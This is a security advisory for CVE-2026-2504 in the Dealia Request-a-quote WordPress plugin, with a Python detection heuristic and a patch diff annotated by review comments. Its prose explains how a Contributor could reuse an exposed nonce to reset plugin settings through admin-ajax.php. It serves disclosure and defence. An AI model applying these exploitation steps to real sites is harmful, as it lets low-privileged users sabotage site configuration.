Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-2504: Dealia – Request a quote <= 1.0.7 – Missing Authorization to Authenticated (Contributor+) Plugin Configuration Reset (dealia-request-a-quote)

CVE ID: CVE-2026-2504
Severity: Medium (CVSS 4.3)
CWE: 862
Vulnerable Version: 1.0.7
Patched Version: 1.0.8
Disclosed: February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2504:
The Dealia – Request a quote WordPress plugin, versions 1.0.7 and earlier, contains a missing authorization vulnerability in multiple AJAX handlers. It allows authenticated users with Contributor-level permissions or higher to reset the plugin's configuration and perform other administrative actions.

Atomic Edge research identifies the root cause in two components. PostsController.php exposes the administrative nonce to any user with the edit_posts capability via wp_localize_script() at line 50; the nonce action was defined as the constant DEALIA_ADMIN_NONCE in the main plugin file. AdminSettingsController.php contains AJAX handlers (login, create_account, reset, refresh, save_additional_settings) that verify this nonce but lack capability checks: each only calls wp_verify_nonce() against DEALIA_ADMIN_NONCE and never validates current_user_can('manage_options').

Exploitation requires an authenticated attacker with at least Contributor permissions. The attacker obtains the DEALIA_ADMIN_NONCE value from the localized JavaScript variables when editing posts. They then craft POST requests to /wp-admin/admin-ajax.php with action parameters matching the vulnerable handlers: dealia_ajax_reset, dealia_ajax_login, dealia_ajax_manage_account, dealia_ajax_refresh, or dealia_save_additional_settings. Each request includes the _wpnonce parameter containing the exposed nonce value. The reset handler at AdminSettingsController.php lines 426-443 is particularly impactful because it calls delete_option('dealia_options'), removing the plugin configuration entirely.

The patch in version 1.0.8 addresses the vulnerability through several changes. The DEALIA_ADMIN_NONCE constant is removed from dealia-request-a-quote.php. Each AJAX handler in AdminSettingsController.php now begins with a capability check: if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 ); }. Nonce verification changes from DEALIA_ADMIN_NONCE to the 'dealia_admin_nonce' action created via wp_create_nonce(). PostsController.php now uses a separate 'dealia_post_nonce' action for post-editing functions. Additional capability checks are added to FormsController.php and ProductsController.php methods.

Successful exploitation allows authenticated attackers with Contributor or higher permissions to reset the plugin configuration, potentially disrupting e-commerce functionality. Attackers can delete the dealia_options database entry, disconnect the plugin from external services, and modify integration settings. This could lead to loss of quote request functionality, broken product forms, and disruption of the WooCommerce integration. The vulnerability does not provide direct privilege escalation to WordPress administrative access but allows unauthorized modification of plugin data.
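As an added illustration of the root cause and patch pattern described above (not part of the advisory and not the plugin's own code), the following Python script turns that reasoning into a heuristic static check: it pairs each wp_ajax_ registration in a bootstrap file with the callback body in a controller and flags bodies that verify a nonce but never call current_user_can(). The two PHP fragments embedded in it are constructed to mirror the 1.0.7 and 1.0.8 handler shapes; they are not the plugin's source.

```python
"""Heuristic static check for the CVE-2026-2504 bug class: a wp_ajax_ handler that
verifies a nonce but never calls current_user_can(). PHP samples are constructed."""
import re
from collections import namedtuple

# Registration style used in bootstrap.php: add_action( 'wp_ajax_<action>', [$ctl, 'method'] )
AJAX_HOOK_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_(nopriv_)?(\w+)['\"]\s*,\s*\[\s*\$\w+\s*,\s*['\"](\w+)['\"]\s*\]")
FUNC_RE = re.compile(r"\bfunction\s+(\w+)\s*\(")
# has_nonce: body calls wp_verify_nonce() (CSRF); has_cap: body calls current_user_can()
# (authorization). A handler with has_nonce but not has_cap is the CWE-862 pattern.
Finding = namedtuple("Finding", "action method has_nonce has_cap")


def _mask(src: str) -> str:
    """Replace comment/string contents with spaces (length kept) so a '{' in text cannot derail brace matching."""
    out, i, n = [], 0, len(src)
    while i < n:
        c = src[i]
        if src.startswith("//", i) or (c == "#" and not src.startswith("#[", i)):
            j = src.find("\n", i)                            # line comment
            j = n if j == -1 else j
        elif src.startswith("/*", i):                        # block comment
            j = src.find("*/", i + 2)
            j = n if j == -1 else j + 2
        elif c in "'\"":                                     # string literal
            j = i + 1
            while j < n and src[j] != c:
                j += 2 if src[j] == "\\" else 1              # skip escaped characters
            j = min(j + 1, n)
        else:
            out.append(c)
            i += 1
            continue
        out.append(" " * (j - i))
        i = j
    return "".join(out)


def extract_methods(src: str) -> dict:
    """Return {method name: masked body, outer braces included}."""
    masked = _mask(src)
    methods = {}
    for m in FUNC_RE.finditer(masked):
        open_idx = masked.find("{", m.end())
        if open_idx == -1:
            continue
        depth, i = 0, open_idx
        while i < len(masked):
            depth += {"{": 1, "}": -1}.get(masked[i], 0)
            if depth == 0:
                break
            i += 1
        methods[m.group(1)] = masked[open_idx:i + 1]
    return methods


def audit(bootstrap_src: str, controller_src: str) -> list:
    """Pair each wp_ajax_ registration with its callback body and classify that body."""
    methods = extract_methods(controller_src)
    findings = []
    for nopriv, action, method in AJAX_HOOK_RE.findall(bootstrap_src):
        body = methods.get(method)
        if nopriv or body is None:   # nopriv endpoints are public by design; unknown callbacks skipped
            continue
        findings.append(Finding(action, method, "wp_verify_nonce(" in body, "current_user_can(" in body))
    return findings


BOOTSTRAP_SRC = r"""<?php
$admin_controller = new Dealia\Controllers\AdminSettingsController();
add_action( 'wp_ajax_dealia_ajax_reset', [$admin_controller, 'reset'] );
add_action( 'wp_ajax_dealia_ajax_refresh', [$admin_controller, 'refresh'] );
"""

CONTROLLER_SRC = r"""<?php namespace Dealia\Controllers;
class AdminSettingsController {
    // 1.0.7 shape: nonce verified, capability never checked (the CVE)
    public function reset() {
        $nonce = filter_input( INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
        if ( empty( $nonce ) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
            wp_send_json_error( [ 'message' => 'Nonce value cannot be verified. {' ], 400 );
        }
        delete_option( 'dealia_options' );
        wp_send_json_success( [ 'redirect' => true ], 201 );
    }
    // 1.0.8 shape: capability check first, then the dedicated admin nonce
    public function refresh() {
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
        }
        $nonce = filter_input( INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
        if ( empty( $nonce ) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
            wp_send_json_error( [ 'message' => 'Nonce value cannot be verified.' ], 400 );
        }
        wp_send_json_success( [], 200 );
    }
}
"""

if __name__ == "__main__":
    for f in audit(BOOTSTRAP_SRC, CONTROLLER_SRC):
        print(f, "MISSING AUTHORIZATION (CWE-862)" if not f.has_cap else "ok")
```

The check is deliberately a heuristic: it reports a capability check anywhere in the method body, so a guard placed after a destructive call would still pass and needs a manual read.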

Differential between vulnerable and patched code

Code Diff
--- a/dealia-request-a-quote/bootstrap.php
+++ b/dealia-request-a-quote/bootstrap.php
@@ -6,35 +6,35 @@
 add_action( 'admin_enqueue_scripts', 'dealia_load_css_to_admin' );

 //Admin Settings
-$admin_controller = new DealiaControllersAdminSettingsController();
+$dealia_admin_controller = new DealiaControllersAdminSettingsController();

-add_action( 'admin_menu', [$admin_controller, 'display_menu_pages'] );
-add_action( 'admin_head', [$admin_controller, 'admin_button_stylesheet'], 999);
-add_action( 'wp_ajax_dealia_ajax_manage_account', [$admin_controller, 'create_account'] );
-add_action( 'wp_ajax_dealia_ajax_login', [$admin_controller, 'login'] );
-add_action( 'wp_ajax_dealia_ajax_reset', [$admin_controller, 'reset'] );
-add_action( 'wp_ajax_dealia_ajax_refresh', [$admin_controller, 'refresh'] );
-add_action( 'wp_ajax_dealia_save_additional_settings', [$admin_controller, 'save_additional_settings'] );
+add_action( 'admin_menu', [$dealia_admin_controller, 'display_menu_pages'] );
+add_action( 'admin_head', [$dealia_admin_controller, 'admin_button_stylesheet'], 999);
+add_action( 'wp_ajax_dealia_ajax_manage_account', [$dealia_admin_controller, 'create_account'] );
+add_action( 'wp_ajax_dealia_ajax_login', [$dealia_admin_controller, 'login'] );
+add_action( 'wp_ajax_dealia_ajax_reset', [$dealia_admin_controller, 'reset'] );
+add_action( 'wp_ajax_dealia_ajax_refresh', [$dealia_admin_controller, 'refresh'] );
+add_action( 'wp_ajax_dealia_save_additional_settings', [$dealia_admin_controller, 'save_additional_settings'] );

 //Data output
-add_action( 'wp_enqueue_scripts', [$admin_controller, 'add_integration_assets'] );
-add_action( 'wp_head', [$admin_controller, 'add_integration_json'] );
+add_action( 'wp_enqueue_scripts', [$dealia_admin_controller, 'add_integration_assets'] );
+add_action( 'wp_head', [$dealia_admin_controller, 'add_integration_json'] );

-$forms_controller = new DealiaControllersFormsController();
-add_action( 'wp_ajax_dealia_get_forms', [$forms_controller, 'list_forms'] );
+$dealia_forms_controller = new DealiaControllersFormsController();
+add_action( 'wp_ajax_dealia_get_forms', [$dealia_forms_controller, 'list_forms'] );

 //Product widget
-$products_controller = new DealiaControllersProductsController();
-add_action( 'add_meta_boxes', [$products_controller, 'on_product_edit_widget'] );
-add_action( 'save_post', [$products_controller, 'manage_post_related_form'] );
+$dealia_products_controller = new DealiaControllersProductsController();
+add_action( 'add_meta_boxes', [$dealia_products_controller, 'on_product_edit_widget'] );
+add_action( 'save_post', [$dealia_products_controller, 'manage_post_related_form'] );

 //Post Gutenberg block
-$posts_controller = new DealiaControllersPostsController();
-add_action( 'admin_enqueue_scripts', [$posts_controller, 'add_legacy_post_edit_assets'] );
-add_action( 'init', [$posts_controller, 'register_block_quote_button'] );
-add_action( 'admin_footer', [$posts_controller, 'print_legacy_form'] );
-add_action( 'admin_init', [$posts_controller, 'add_legacy_editor_styles']);
+$dealia_posts_controller = new DealiaControllersPostsController();
+add_action( 'admin_enqueue_scripts', [$dealia_posts_controller, 'add_legacy_post_edit_assets'] );
+add_action( 'init', [$dealia_posts_controller, 'register_block_quote_button'] );
+add_action( 'admin_footer', [$dealia_posts_controller, 'print_legacy_form'] );
+add_action( 'admin_init', [$dealia_posts_controller, 'add_legacy_editor_styles']);

-add_action( 'wp_ajax_dealia_ajax_validate_and_print_legacy_button', [$posts_controller, 'validate_and_print_legacy_button'] );
+add_action( 'wp_ajax_dealia_ajax_validate_and_print_legacy_button', [$dealia_posts_controller, 'validate_and_print_legacy_button'] );

 dealia_modify_headers();
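Review bot: the five AdminSettingsController actions (manage_account, login, reset, refresh, save_additional_settings) are registered under wp_ajax_ only, with no wp_ajax_nopriv_ twin, so they were reachable only by logged-in users even in 1.0.7, which matches the Contributor+ precondition in the analysis; the dealia_ prefix added to the global controller variables is namespace hygiene with no security effect.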
--- a/dealia-request-a-quote/dealia-request-a-quote.php
+++ b/dealia-request-a-quote/dealia-request-a-quote.php
@@ -7,18 +7,17 @@
  * Author:          dealia.com
  * Author URI:      https://dealia.com
  * Text Domain:     dealia-request-a-quote
- * Version:         1.0.7
+ * Version:         1.0.8
  * License:			GPLv2
  * @package         Dealia
  */

 define('DEALIA_PLUGIN_PATH', plugin_dir_path( __FILE__ ));
 define('DEALIA_PLUGIN_URL', plugin_dir_url( __FILE__ ));
-define('DEALIA_PLUGIN_VERSION', "1.0.7");
+define('DEALIA_PLUGIN_VERSION', "1.0.8");
 define('DEALIA_SITE_URL', "https://dealia.com");
 define('DEALIA_SITE_ADMIN_URL', "https://admin.dealia.com");
 define('DEALIA_API_URL', "https://jack.dealia.com");
-define('DEALIA_ADMIN_NONCE', 'nonce_Y7deR0HjpErwQn');
 define('DEALIA_DEFAULT_BUTTON_COLOR', '#1b66e7');

 require_once DEALIA_PLUGIN_PATH . '/bootstrap.php';
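Review bot: dropping DEALIA_ADMIN_NONCE is fine in itself (a nonce action name is not a secret, and the real fix is the capability checks), but the replacement literal 'dealia_admin_nonce' is now typed by hand in every AdminSettingsController handler, so a typo in one of them would make that endpoint reject every request while the others keep working. Keep the action name in a single class constant and reference it from both wp_create_nonce() and wp_verify_nonce().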
--- a/dealia-request-a-quote/src/Controllers/AdminSettingsController.php
+++ b/dealia-request-a-quote/src/Controllers/AdminSettingsController.php
@@ -2,6 +2,8 @@

 namespace DealiaControllers;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaServicesCountryInfoProvider;
 use DealiaServicesDataFetcher;
 use DealiaServicesDealiaApiForms;
@@ -133,18 +135,18 @@

         $is_permalink_supported = dealia_is_permalink_type_supported();

-		View::render_echo('main-page.php', compact(
-			'options_set',
-			'access_token_set',
-			'is_woocommerce_active',
-			'hide_add_to_cart',
-			'hide_prices',
-			'forms',
-			'form_for_all_products',
-			'products_covered',
-            'countries_list',
-            'is_permalink_supported',
-		));
+		View::render_echo('main-page.php', [
+			'dealia_options_set' => $options_set,
+			'dealia_access_token_set' => $access_token_set,
+			'dealia_is_woocommerce_active' => $is_woocommerce_active,
+			'dealia_hide_add_to_cart' => $hide_add_to_cart,
+			'dealia_hide_prices' => $hide_prices,
+			'dealia_forms' => $forms,
+			'dealia_form_for_all_products' => $form_for_all_products,
+			'dealia_products_covered' => $products_covered,
+            'dealia_countries_list' => $countries_list,
+            'dealia_is_permalink_supported' => $is_permalink_supported,
+		]);
 	}

 	function menu_page_view($page = 'dashboard') {
@@ -244,10 +246,14 @@
 	}

 	function login() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }
+
 		$errors = [];

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING );
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors[] = [
 				'field' => '_wpnonce',
 				'message' => 'Nonce value cannot be verified.',
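Review bot: the new current_user_can( 'manage_options' ) guard sits before the nonce check, which is the right order (authorization first, CSRF second), and wp_send_json_error() ends the request via wp_die(), so the body is not reached for non-admins. Unrelated to the fix but visible in the same hunk: FILTER_SANITIZE_STRING is deprecated as of PHP 8.1, so `$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING );` emits deprecation notices on current PHP; reading the field with sanitize_text_field( wp_unslash( $_POST['_wpnonce'] ?? '' ) ) or calling check_ajax_referer( 'dealia_admin_nonce', '_wpnonce' ) avoids that.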
@@ -310,11 +316,14 @@
 	}

 	function create_account() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }

 		$errors = [];

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors[] = [
 				'field' => '_wpnonce',
 				'message' => 'Nonce value cannot be verified.',
@@ -417,9 +426,12 @@
 	}

 	public function reset() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors = [];
 			$errors[] = [
 				'field' => '_wpnonce',
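Review bot: this is the handler the analysis singles out, since the body that follows deletes dealia_options, so the early exit matters most here. It relies on wp_send_json_error() terminating the request through wp_die(); that holds in production, but if the die handler is ever filtered (as test harnesses do) execution would fall through into the nonce check and then the delete. An explicit `return;` after wp_send_json_error() in each of these guards makes the exit independent of the die handler.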
@@ -433,10 +445,14 @@
 		wp_send_json_success(['redirect' => true], 201);
 	}
 	public function refresh() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }
+
 		$errors = [];

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors[] = [
 				'field' => '_wpnonce',
 				'message' => 'Nonce value cannot be verified.',
@@ -475,10 +491,14 @@
 	}

 	public function save_additional_settings() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }
+
 		$errors = [];

 		$nonce = filter_input(INPUT_POST, '_wpnonce', FILTER_SANITIZE_STRING ) ?? false;
-		if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+		if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_admin_nonce' ) ) {
 			$errors[] = [
 				'field' => '_wpnonce',
 				'message' => 'Nonce value cannot be verified.',
--- a/dealia-request-a-quote/src/Controllers/BaseController.php
+++ b/dealia-request-a-quote/src/Controllers/BaseController.php
@@ -2,6 +2,8 @@

 namespace DealiaControllers;

+if (!defined('ABSPATH')) exit;
+
 class BaseController {
 	public function __construct() {}
 }
--- a/dealia-request-a-quote/src/Controllers/FormsController.php
+++ b/dealia-request-a-quote/src/Controllers/FormsController.php
@@ -2,6 +2,8 @@

 namespace DealiaControllers;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaServicesDealiaApiForms;

 class FormsController extends BaseController {
@@ -14,6 +16,10 @@
 	}
 	public function list_forms() {

+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
 		$forms = $this->forms->get_list_product_forms();

 		$result = [];
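Review bot: list_forms() is the wp_ajax_dealia_get_forms callback (bootstrap.php hunk above), so `return false;` on a failed capability check is not an error response: admin-ajax.php finishes with wp_die( '0' ), the client receives HTTP 200 with body 0, and a denied request is indistinguishable from an empty result. Use wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 ) as the AdminSettingsController handlers do. No nonce verification is visible in this hunk either; if the function has none, verifying 'dealia_post_nonce' here would be consistent with the rest of the patch.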
--- a/dealia-request-a-quote/src/Controllers/PostsController.php
+++ b/dealia-request-a-quote/src/Controllers/PostsController.php
@@ -7,12 +7,14 @@
 use DealiaServicesView;
 use WP_Query;

+if ( ! defined( 'ABSPATH' ) ) exit;
 class PostsController extends BaseController {

 	private $options = null;

 	private $forms = null;

+    #region public
 	public function __construct() {
 		parent::__construct();

@@ -48,7 +50,7 @@

         wp_localize_script( 'dealia_quote_button_block', 'dealia_quote_button_block_params', array(
             'ajax_url' => admin_url('admin-ajax.php'),
-            'nonce' => wp_create_nonce( DEALIA_ADMIN_NONCE ),
+            'nonce' => wp_create_nonce( 'dealia_post_nonce' ),
         ));

 		register_block_type('dealia-request-a-quote/quote-button', [
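Review bot: switching the localized value to wp_create_nonce( 'dealia_post_nonce' ) is what closes the exposure path described in the analysis: the nonce handed to anyone with edit_posts now verifies only against the 'dealia_post_nonce' action, so it can no longer be replayed against the admin handlers, which verify 'dealia_admin_nonce'. A one-line comment here stating that this value is deliberately not the admin nonce would stop a future refactor from merging them again.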
@@ -76,11 +78,19 @@
 	}

 	public function add_legacy_editor_styles() {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
         add_theme_support( 'editor-styles' );
         add_editor_style( 'assets/css/dealia-integration-admin.css' );
 	}

 	public function view_quote_button_block($attributes) {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
 		if ( empty($attributes) || empty($attributes['form_name']) || empty($attributes['name']) ) {
 			return "";
 		}
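Review bot: view_quote_button_block($attributes) renders 'widgets/dealia-nonproduct-button.php' from block attributes, which looks like the block's render callback; if it runs on the front end, the new edit_posts/edit_pages guard suppresses the quote button for ordinary visitors, who hold neither capability. Confirm where this callback is reached; if it serves front-end rendering, the guard belongs only in the admin-side handlers. Also `return false;` mixes types with the `return "";` just below; a render callback should return a string.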
@@ -91,7 +101,7 @@
 		$button_color = !empty($attributes['button_color']) ? $attributes['button_color'] : DEALIA_DEFAULT_BUTTON_COLOR;

 		return View::render('widgets/dealia-nonproduct-button.php', [
-			'params' => [
+			'dealia_params' => [
 				'name' => $attributes['name'],
 				'form_name' => $attributes['form_name'],
 				'image_url' => $image_url,
@@ -103,8 +113,12 @@

 	public function add_legacy_post_edit_assets($hook) {

-		if ( 'edit.php' != $hook && 'post.php' != $hook) {
-			return;
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
+		if ( !in_array($hook, ['edit.php','post.php','post-new.php'])) {
+			return false;
 		}

 		wp_enqueue_style(
@@ -122,17 +136,24 @@
 	}

 	public function print_legacy_form() {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }
+
 		global $pagenow;
-		if ($pagenow === 'edit.php'|| $pagenow === 'post.php') {
+		if (in_array($pagenow, ['edit.php','post.php','post-new.php'])) {
 			View::render_echo('widgets/post-edit-legacy.php');
 		}
 	}

 	public function validate_and_print_legacy_button() {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+        }

         $nonce = filter_input( INPUT_POST, 'nonce', FILTER_SANITIZE_FULL_SPECIAL_CHARS );

-        if ( empty($nonce) || ! wp_verify_nonce( $nonce, DEALIA_ADMIN_NONCE ) ) {
+        if ( empty($nonce) || ! wp_verify_nonce( $nonce, 'dealia_post_nonce' ) ) {
             $errors[] = [
                 'field' => 'nonce',
                 'message' => 'Nonce value cannot be verified.',
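Review bot: this handler legitimately serves editors, and it now pairs the edit_posts/edit_pages check with the 'dealia_post_nonce' action that PostsController localizes, so capability and nonce scope are aligned. As with the admin handlers, an explicit `return;` after wp_send_json_error() keeps the guard independent of the die handler.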
@@ -181,4 +202,6 @@
 			'button' => $button,
 		], 200);
 	}
+
+    #endregion
 }
--- a/dealia-request-a-quote/src/Controllers/ProductsController.php
+++ b/dealia-request-a-quote/src/Controllers/ProductsController.php
@@ -2,6 +2,8 @@

 namespace DealiaControllers;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaServicesDealiaApiForms;
 use DealiaServicesDealiaApiIntegration;
 use DealiaServicesDealiaApiProducts;
@@ -16,6 +18,7 @@

 	private $integration = null;

+    #region public
 	public function __construct() {
 		parent::__construct();

@@ -24,7 +27,11 @@
 		$this->forms = new Forms();
 		$this->products = new Products();
 	}
-	function on_product_edit_widget() {
+	public function on_product_edit_widget() {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return;
+        }
+
 		if (!$this->options->check_all_required_set()) {
 			return;
 		}
@@ -39,7 +46,12 @@
 		);
 	}

-	function on_product_edit_widget_content ($post) {
+	public function on_product_edit_widget_content ($post) {
+
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return;
+        }
+
 		if (!$this->options->check_all_required_set()) {
 			return;
 		}
@@ -47,12 +59,12 @@
 		$forms = [];
 		$forms_response = $this->forms->get_list_product_forms();
 		$current_form = $this->check_form_assigned($post->ID);
-		$all_products_enabled = false;
+		$dealia_all_products_enabled = false;

 		if (!$current_form) {
 			$current_form = $this->check_form_assigned_globally();
 			if ($current_form) {
-				$all_products_enabled = true;
+				$dealia_all_products_enabled = true;
 			}
 		}

@@ -63,44 +75,13 @@
         $is_permalink_supported = dealia_is_permalink_type_supported();

 		View::render_echo('widgets/product-edit-widget.php', [
-			'forms' => $forms,
-			'current_form' => $current_form,
-			'all_products_enabled' => $all_products_enabled,
-            'is_permalink_supported' => $is_permalink_supported,
+			'dealia_forms' => $forms,
+			'dealia_current_form' => $current_form,
+			'dealia_all_products_enabled' => $dealia_all_products_enabled,
+            'dealia_is_permalink_supported' => $is_permalink_supported,
 		]);
 	}

-	function get($post_id) {
-		if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
-			return false;
-		}
-
-		if (!$this->options->check_all_required_set()) {
-			return false;
-		}
-
-		$parent_id = wp_is_post_revision( $post_id );
-
-		if ( false !== $parent_id ) {
-			$post_id = $parent_id;
-		}
-
-		$post = get_post( $post_id );
-		$post_name = $post->post_name;
-
-		try {
-			$search_for_product_results = $this->products->get_by_url($post_name);
-		} catch (Exception $exception) {
-			$search_for_product_results = $this->products->default_request_error_output();
-		}
-
-		if ($search_for_product_results['success'] && !empty($search_for_product_results['data'])) {
-			return $search_for_product_results['data'][0];
-		}
-
-		return false;
-	}
-
 	public function check_form_assigned_globally() {
 		$company_settings = $this->integration->get_company_raw_settings();
 		$form_id = false;
@@ -116,21 +97,11 @@
 		return $form_id;
 	}

-	public function check_form_assigned($post_id) {
-		$product = $this->get($post_id);
+	public function manage_post_related_form($post_id) {
+        if (! current_user_can( 'edit_posts' ) && ! current_user_can( 'edit_pages' ) ) {
+            return false;
+        }

-		if (!$product) {
-			return false;
-		}
-
-		if (!is_array($product) || empty($product['form_id'])) {
-			return false;
-		}
-
-		return $product['form_id'];
-	}
-
-	function manage_post_related_form($post_id) {
 		if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
 			return false;
 		}
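Review bot: manage_post_related_form($post_id) runs on save_post, and the added guard tests the generic edit_posts / edit_pages capabilities rather than the post being saved. The object capability current_user_can( 'edit_post', $post_id ) matches what save_post means here: a user can hold edit_posts and still not be allowed to edit this particular post. Keeping the DOING_AUTOSAVE check is good.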
@@ -160,15 +131,63 @@
 			return false;
 		}

-		$all_products_enabled = (!empty($dealia_app_products_enabled) && 1 === (int) $dealia_app_products_enabled );
+		$dealia_all_products_enabled = (!empty($dealia_app_products_enabled) && 1 === (int) $dealia_app_products_enabled );

-		if ($all_products_enabled || (!$all_products_enabled && $dealia_is_active)) {
+		if ($dealia_all_products_enabled || (!$dealia_all_products_enabled && $dealia_is_active)) {
 			return $this->assign_form_to_post($post_id, $dealia_form_id);
 		} else {
 			return $this->unassign_form_from_post($post_id);
 		}
 	}

+    #endregion
+
+    #region private
+
+    private function check_form_assigned($post_id) {
+        $product = $this->get($post_id);
+
+        if (!$product) {
+            return false;
+        }
+
+        if (!is_array($product) || empty($product['form_id'])) {
+            return false;
+        }
+
+        return $product['form_id'];
+    }
+    private function get($post_id) {
+
+        if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) {
+            return false;
+        }
+
+        if (!$this->options->check_all_required_set()) {
+            return false;
+        }
+
+        $parent_id = wp_is_post_revision( $post_id );
+
+        if ( false !== $parent_id ) {
+            $post_id = $parent_id;
+        }
+
+        $post = get_post( $post_id );
+        $post_name = $post->post_name;
+
+        try {
+            $search_for_product_results = $this->products->get_by_url($post_name);
+        } catch (Exception $exception) {
+            $search_for_product_results = $this->products->default_request_error_output();
+        }
+
+        if ($search_for_product_results['success'] && !empty($search_for_product_results['data'])) {
+            return $search_for_product_results['data'][0];
+        }
+
+        return false;
+    }
 	private function assign_form_to_post($post_id, $form_id) {
 		try {
 			$product_to_update = $this->get($post_id);
@@ -223,6 +242,7 @@
 		}

 		return true;
-
 	}
+
+    #endregion
 }
--- a/dealia-request-a-quote/src/Library/ApiRequest.php
+++ b/dealia-request-a-quote/src/Library/ApiRequest.php
@@ -2,6 +2,8 @@

 namespace DealiaLibrary;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 use DealiaServicesOptions;
 use Exception;
 use WP_Error;
@@ -68,19 +70,10 @@

 			$response = wp_remote_request( $url, $request_params );

-//print_r($response );
-//exit;
-
 		} catch ( Exception $exception ) {

 			self::increase_attempts();

-			$message = implode(" ", [
-				__CLASS__ . "::request : ",
-				"Code " . $exception->getCode() . ";",
-				$exception->getMessage(),
-			]);
-
 			return array(
 				'code' => 500,
 				'messages' => array('Request error'),
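Review bot: the removed `$message` block was assembled and never used, so deleting it changes nothing, but the catch branch now discards the exception entirely while returning a generic 'Request error'. An error_log() of $exception->getCode() and getMessage() when WP_DEBUG is set would keep API failures diagnosable without logging payloads.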
@@ -98,14 +91,6 @@
 			$body = $response['body'];
 		}

-		$request_log_message = implode(" ", [
-			gmdate("Y-m-d H:i:s"),
-			"Request : " . $type ."|". $action . " ;",
-			"Data: " . wp_json_encode($data) ." ;",
-			"Params: " . wp_json_encode($params) ." ;",
-			"Response: " . $body . " ;",
-		]);
-
 		return json_decode( $body, true);
 	}

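Review bot: the removed `$request_log_message` would have concatenated the request data, params and the raw response body into one string; it was never written anywhere, so behaviour is unchanged, and not adding a log sink for it is the right call, since such a line would have persisted quote data and API responses in plain text.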
--- a/dealia-request-a-quote/src/Services/CountryInfoProvider.php
+++ b/dealia-request-a-quote/src/Services/CountryInfoProvider.php
@@ -2,12 +2,14 @@

 namespace DealiaServices;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 class CountryInfoProvider extends Service {

     public function getByCountryCode($countryCode) {
         $countries = $this->getList();
         if (!isset($countries[$countryCode])) {
-            throw new Exception("Country Code $countryCode does not exist");
+            throw new Exception(esc_html__("Country Code does not exist", "dealia-request-a-quote"));
         }
         return $countries[$countryCode];
     }
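Review bot: wrapping the message in esc_html__() makes it translatable, but it also drops $countryCode from the text, so a failure no longer says which code was rejected. If the code should stay in the message, keep it as data: sprintf( __( 'Country code %s does not exist', 'dealia-request-a-quote' ), esc_html( $countryCode ) ) preserves both the translation and the diagnostic detail.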
--- a/dealia-request-a-quote/src/Services/DataFetcher.php
+++ b/dealia-request-a-quote/src/Services/DataFetcher.php
@@ -2,6 +2,8 @@

 namespace DealiaServices;

+if ( ! defined( 'ABSPATH' ) ) exit;
+
 class DataFetcher extends Service {
 	public function handle_custom_query_var( $query, $query_vars ) {
